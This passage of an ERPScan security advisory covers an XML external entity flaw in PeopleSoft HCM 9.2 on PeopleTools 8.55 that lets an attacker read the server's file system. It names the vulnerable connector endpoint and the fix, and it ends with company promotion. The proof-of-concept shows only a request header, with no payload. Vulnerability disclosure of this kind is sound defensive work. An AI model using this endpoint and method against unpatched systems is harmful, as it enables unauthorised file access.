needed to exploit) High (H) +UI : User Interaction (Required user participation) None (N) +S : Scope (Change in scope due to impact caused to components beyond +the vulnerable component) Changed (C) +C : Impact to Confidentiality High (H) +I : Impact to Integrity High (H) +A : Impact to Availability High (H) + +3. VULNERABILITY DESCRIPTION + +A malicious user can modify an XML-based request to include XML +content that is then parsed locally. + +4. VULNERABLE PACKAGES + +PeopleSoft HCM 9.2 on PeopleTools 8.55 + +5. SOLUTIONS AND WORKAROUNDS + +To correct this vulnerability, implement Oracle CPU April 2017 + +6. AUTHOR + +Nadya Krivdyuk + + +7. TECHNICAL DESCRIPTION + +An attacker can use an XML external entity vulnerability to send +specially crafted unauthorized XML requests, which will be processed +by the XML parser. The attacker can use an XML external entity +vulnerability for getting unauthorised access to the OS file system. + +PoC + + +POST /PSIGW/PeopleSoftServiceListeningConnector HTTP/1.1 +Host: 172.16.2.91:8000 +Content-type: text/xml + + +8. ABOUT ERPScan Research + +ERPScan research team specializes in vulnerability research and +analysis of critical enterprise applications. It was acknowledged +multiple times by the largest software vendors like SAP, Oracle, +Microsoft, IBM, VMware, HP for discovering more than 400 +vulnerabilities in their solutions (200 of them just in SAP!). + +ERPScan researchers are proud of discovering new types of +vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The +Best Server-Side Bug" nomination at BlackHat 2013. + +ERPScan experts participated as speakers, presenters, and trainers at +60+ prime international security conferences in 25+ countries across +the continents ( e.g. BlackHat, RSA, HITB) and conducted private +trainings for several Fortune 2000 companies. + +ERPScan researchers carry out the EAS-SEC project that is focused on +enterprise application security awareness by issuing annual SAP +security researches. + +ERPScan experts were interviewed in specialized info-sec resources and +featured in major media worldwide. Among them there are Reuters, +Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, +Chinabyte, etc. + +Our team consists of highly-qualified researchers, specialized in +various fields of cybersecurity (from web application to ICS/SCADA +systems), gathering their experience to conduct the best SAP security +research. + +9. ABOUT ERPScan + +ERPScan is the most respected and credible Business Application +Cybersecurity provider. Founded in 2010, the company operates globally +and enables large Oil and Gas, Financial, Retail and other +organizations to secure their mission-critical processes. Named as an +‘Emerging Vendor’ in Security by CRN, listed among “TOP 100 SAP +Solution providers” and distinguished by 30+ other awards, ERPScan is +the leading SAP SE partner in discovering and resolving security +vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to +assist in improving the security of their latest solutions. + +ERPScan’s primary mission is to close the gap between technical and +business security, and provide solutions for CISO's to evaluate and +secure SAP and Oracle ERP systems and business-critical applications +from both cyberattacks and internal fraud. As a rule, our clients are +large enterprises, Fortune 2000 companies and MSPs, whose requirements +are to actively monitor and manage security of vast SAP and Oracle +landscapes on a global scale. + +We ‘follow the sun’ and have two hubs, located in Palo Alto and +Amsterdam, to provide threat intelligence services, continuous support +and to operate local offices and partner network spanning 20+ +countries around the globe. + + + + +Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301 + +Phone: 650.798.5255 + +Twitter: @erpscan + +Scoop-it: Business Application Security \ No newline at end of file